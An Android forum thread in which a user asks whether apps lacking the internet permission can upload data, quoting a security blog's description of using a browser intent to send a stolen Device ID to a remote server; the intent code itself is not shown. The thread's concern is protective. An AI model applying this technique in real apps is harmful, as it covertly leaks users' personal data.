Welcome to the Android Central Forums Create Your Account or Ask a Question Answers in 5 minutes - no registration required!
Results 1 to 4 of 4
  1. Thread Author  Thread Author    #1  
    agp101's Avatar

    Posts
    81 Posts
    Global Posts
    1,521 Global Posts

    Default Not like many care.. but is this a huge security hole?

    Hey everyone.

    I'm here today hoping to acquire useful information and knowledge from you good folks. I think I may have been misled by a misconception of mine, and I need to get to the bottom of it.

    I'm very security conscious. That is, I am as secure as can be to the best of my knowledge. I have 2-step verification turned on on about 8 different services, and I vigorously go through android app permission details, for example. I take security seriously and try my best to stay safe. Some don't care and some do, whatever. Personal choice.

    One (misconception?) I've had about permissions is that unless an app has an internet permission, specifically, "Full Internet Access", it cannot send (upload) data to the internet. So for example, when I installed the app "Dash Notifier" (I'm not saying this app is malicious, merely discussing it as an example of a possible situation) which is a Dash Clock Widget extension, I didn't mind giving it access to my notifications at the OS level. It was a slight red flag, as it always should be, but then again this was needed for the app to perform its function. Fair enough. It only had "prevent phone from sleeping" as a permission anyway, so it CAN'T upload data to the internet, or a server, right? Right??

    Well, I'm not so sure anymore. My friend factory reset their android device, and I recommended they install the Dash Notifier extension. After all, this friend already had the Dash Clock Widget. So they did install it, and upon setup it asked for this Notifications access, which pretty much sells the app your soul. Again, a red flag arises naturally, but I said I must not have allowed this app on my device if it was a security risk.

    So I do my double check and check the permissions.. Just "prevent phone from sleeping." So I said okay, can't do anything with the information I approved for it anyway. But is that really the case, I asked? So I found another app I had installed which required "Full Internet Access". I clicked on it for a description and it said "Allows the app to create network sockets and use custom network protocols. The browser and other applications provide means to send data to the internet, so this permission is not required to send data to the internet.
    "

    I've read this a bunch of times and always found it vague (aren't they all?). But this time I really got to thinking "Can apps really send out data without internet permissions at all? Without ANY permissions for that matter?" (Granted that they have access to this information through other permissions.)

    So I did some quick research and at the end of it, I found a blog post by Trend Micro at this link here: Bypassing Android Permissions: What You Need to Know

    So far I haven't found any sources which support a counter argument to this blog, which is why I'm here personally asking you folks for some genuine knowledge on the matter, for myself and anyone else interested.
    Excerpt:
    Misusing the Default Browser to Upload Information

    In Android, an app can launch another apps component using an intent, an abstract data structure that describes the operation to be executed. Each intent consists of action (the action to be performed) and data required to execute the action. When an app sends out an intent, the mobile OS chooses the appropriate app to handle it.

    An intent with action*Intent.ACTION_VIEW, for example, paired with data*Uri.parse(http://www.google.com)indicates that the app wants to view the*Googlewebpage. If this intent is sent out, the mobile OS determines the best choice to launch the browser.

    With this in mind, a shady developer can develop an app with an intent to open a browser and upload any stolen data to the desired server. Should a malicious app want to upload the*Device ID*to serverhttp://example.com, the developer can craft the intent this way:



    Since the browser opens the URL, the malicious app does not need to declare*android.permission.INTERNETbecause this was already acquired by the browser app.
    This means any app mustn't request any permissions at all, yet can send data to a server ready to accept this data through a request to send data through the browser.

    This pretty much is my worst fear in terms of security. I understand apps need internet permissions to receive data and to display ads and whatnot. But if what I'm stumbling upon here is true it means that every single app on my phone, on your phone, on the Play Store, can send out any of our information to a server. This can't possible be? This seems like a huge security hole to me. How can we possibly protect ourselves from any risk? The back door feels wide open.

    And apps need these permissions. For example who doesn't use apps like Whatsapp or Viber, who has access to contacts and lots of other personal information, which puts not only you at risk but others too! If you don't have these apps that's okay, take your pick, you're using SOMETHING that requests personal information. There's always something. At the end of the day we need our phones to work for us but we need them to do it safely.

    So who knows anything about this? Anything legitament? No more guesses, just facts.

    Thanks for reading, I know it was a long one.

    Posted via Android Central App
    Thanked by:
  2. #2  
    Golfdriver97's Avatar

    Posts
    21,700 Posts
    Global Posts
    22,140 Global Posts
    ROM
    Liquidsmooth ROM

    Default Re: Not like many care.. but is this a huge security hole?

    I would look this over: Android 101: What some of those scary application permissions mean | Android Central
    (It is a little dated, but still applies for the most part)
    Depending on the app and the permissions, most of the time the permissions they are associated with make sense.

    Phone Timeline
    'If we could change ourselves, the tendencies in the world would also change.' - Mahatma Gandhi
    Community Guidelines and also here
  3. Thread Author  Thread Author    #3  
    agp101's Avatar

    Posts
    81 Posts
    Global Posts
    1,521 Global Posts

    Default

    Yes thank you. Actually I've read read that many times! It's a great guide.

    But in the case I'm bringing up, I'm referring to apps that can upload data to the internet without any permissions at all, because they can simply go through the browser and don't, in fact, need internet permissions at all. As far as I know, all apps could do this.

    Can anyone prove this wrong? I really hope someone can, cause that would be excellent news.

    Posted via Android Central App
  4. #4  

    Default Re: Not like many care.. but is this a huge security hole?

    Quote Originally Posted by agp101 View Post
    Yes thank you. Actually I've read read that many times! It's a great guide.

    But in the case I'm bringing up, I'm referring to apps that can upload data to the internet without any permissions at all, because they can simply go through the browser and don't, in fact, need internet permissions at all. As far as I know, all apps could do this.

    Can anyone prove this wrong? I really hope someone can, cause that would be excellent news.

    Posted via Android Central App
    If, judging by the way you have provided this information, it seems a feasible method. Google, heck phone companies even, would not allow this would they? If you could good sir, could you compile and send me all the info you've collected on this to my E-Mail? I'd really love to delve into this with some intent!
    Regards
    Michael Nancarrow

Similar Threads

  1. S Pen Command Wheel is gone!
    By firemcd in forum Verizon Galaxy Note 2
    Replies: 3
    Last Post: 05-01-2014, 03:43 PM
  2. Replies: 8
    Last Post: 05-01-2014, 10:12 AM
  3. Is Kit Kat on New Phones?
    By realjet in forum Verizon LG G2
    Replies: 2
    Last Post: 05-01-2014, 03:11 AM
  4. moto x is awesome
    By fiat3192 in forum Moto X (2013)
    Replies: 2
    Last Post: 05-01-2014, 01:31 AM
  5. Delete this thread?
    By FutureMarine in forum Sprint Galaxy S3 Rooting, ROMs, and Hacks
    Replies: 1
    Last Post: 04-30-2014, 07:25 PM

Posting Permissions